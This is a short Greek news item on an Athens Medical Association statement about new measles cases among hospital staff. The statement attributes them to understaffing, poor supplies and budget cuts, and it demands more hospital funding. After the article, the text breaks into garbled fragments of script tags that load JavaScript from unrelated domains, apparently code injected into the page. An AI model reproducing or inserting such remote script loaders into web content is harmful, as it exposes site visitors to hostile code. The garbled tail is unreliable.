Ιατρικός Σύλλογος Αθηνών: Νέα κρούσματα ιλαράς σε υγειονομικό προσωπικό νοσοκομείων

Ιατρικός Σύλλογος Αθηνών: Νέα κρούσματα ιλαράς σε υγειονομικό προσωπικό νοσοκομείων

Η αύξηση της χρηματοδότησης απαραίτητη προϋπόθεση για τη διασφάλιση της δημόσιας υγείας

Για νέα κρούσματα ιλαράς σε υγειονομικό προσωπικό δημόσιων νοσοκομείων κάνει λόγο σε ανακοίνωσή του ο Ιατρικός Σύλλογος Αθηνών.

Σύμφωνα με την ανακοίνωση «το προσωπικό του ΕΣΥ, εργάζεται σε συνθήκες επαγγελματικής εξουθένωσης, λόγω των τραγικών ελλείψεων, στη στελέχωσή των μονάδων υγείας. Την ίδια ώρα, οι ελλείψεις και η ποιοτική υποβάθμιση των υλικών (γάντια που σκίζονται, έλλειψη καθαριστικών κ.τ.λ.), συνιστούν ένα επισφαλές περιβάλλον που εκθέτει το προσωπικό, σε σοβαρούς κινδύνους».

Ο ΙΣΑ αναφέρει επίσης ότι «η μείωση των κονδυλίων που προβλέπονται στο φετινό προϋπολογισμό, για τα δημόσια νοσοκομεία, θέτει σε σοβαρό κίνδυνο την υγεία και τη ζωή, τόσο των ασθενών όσο και των εργαζόμενων».

Απαραίτητη προϋπόθεση για τη διασφάλιση της δημόσιας υγείας, είναι σύμφωνα με τον Ιατρικό Σύλλογο, «η αύξηση της χρηματοδότησης των δημόσιων νοσοκομείων». Ζητά μάλιστα «αξιοπρεπείς αμοιβές, για το προσωπικό των νοσοκομείων και συνθήκες εργασίας που να διασφαλίζουν την ασφάλεια των εργαζόμενων».___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>